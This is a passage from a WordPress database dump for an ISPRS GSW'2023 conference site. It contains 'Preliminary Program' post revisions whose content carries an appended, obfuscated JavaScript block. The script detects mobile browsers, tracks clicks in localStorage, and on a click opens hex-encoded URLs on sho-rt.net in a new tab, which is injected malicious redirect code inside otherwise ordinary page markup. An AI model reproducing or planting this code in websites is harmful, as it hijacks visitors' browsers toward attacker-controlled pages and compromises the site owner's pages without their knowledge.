_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Preliminary Program','','inherit','closed','closed','','2669-revision-v1','','','2023-08-01 05:34:30','2023-08-01 05:34:30','',2669,'https://gsw2023.com/?p=5067',0,'revision','',0),
(5068,1,'2023-08-01 05:35:08','2023-08-01 05:35:08','','preliminary','','inherit','open','closed','','preliminary-2','','','2023-08-01 05:35:08','2023-08-01 05:35:08','',2669,'https://gsw2023.com/wp-content/uploads/2023/08/preliminary-1.png',0,'attachment','image/png',0),
(5069,1,'2023-08-01 05:35:35','2023-08-01 05:35:35','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3><strong>ISPRS GSW’2023 - Preliminary Program</strong></h3>\n<p>[/vc_column_text][vc_single_image image=\"5068\" img_size=\"1900x1000\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Preliminary Program','','inherit','closed','closed','','2669-revision-v1','','','2023-08-01 05:35:35','2023-08-01 05:35:35','',2669,'https://gsw2023.com/?p=5069',0,'revision','',0),
(5070,1,'2023-08-01 05:35:52','2023-08-01 05:35:52','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3><strong>ISPRS GSW’2023 - Preliminary Program</strong></h3>\n<p>[/vc_column_text][vc_single_image image=\"5068\" img_size=\"1900x1000\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 